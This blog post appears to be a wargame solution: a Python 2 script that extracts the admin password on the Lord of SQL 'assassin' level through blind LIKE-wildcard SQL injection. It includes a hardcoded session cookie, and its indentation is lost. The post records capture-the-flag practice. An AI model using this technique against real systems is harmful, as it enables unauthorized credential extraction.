import urllib2
def request(data):
url = "https://los.eagle-jump.org/assassin_bec1c90a48bc3a9f95fbf0c8ae8c88e1.php?pw="+urllib2.quote(data)
req = urllib2.Request(url)
req.add_header('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko')
req.add_header('Cookie','__cfduid=d8ef4b715b1243db43a171dd9c1503f641517927129; PHPSESSID=dp23m3nrh8cfflj2iga3np4t46')
response = urllib2.urlopen(req).read()
if "Hello admin" in str(response):
return "admin"
elif "Hello guest" in str(response):
return "guest"
else:
return False
length = 0
admin_pw = ""
strings = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@"
tmp = ""
tmp1 = 0
payload = ""
for i in range(1,51):
payload += "_"
result = request(payload)
if result=="admin":
length = i
break
if result=="guest":
tmp1 = i
if i==50:
length=tmp1
print "[*]Admin Password Length = " + str(length)
for j in range(1,length+1):
for i in range(0,len(strings)):
payload = admin_pw+strings[i]+"_"*(8-j)
result = request(payload)
if result == "admin":
admin_pw += strings[i]
print "[-]Admin Password = " + admin_pw
break
if result == "guest":
tmp = strings[i]
if i==len(strings)-1:
admin_pw+=tmp
print "[*]Admin Password = " + admin_pw
'Wargame > Lord of SQL' 카테고리의 다른 글
| LOS succubus (0) | 2018.02.08 |
|---|---|
| LOS zombie_assassin (0) | 2018.02.08 |
| LOS giant (0) | 2018.02.08 |
| LOS bugbear (0) | 2018.02.08 |
| LOS darknight (0) | 2018.02.08 |
JeonYoungSin
메모 기록용 공간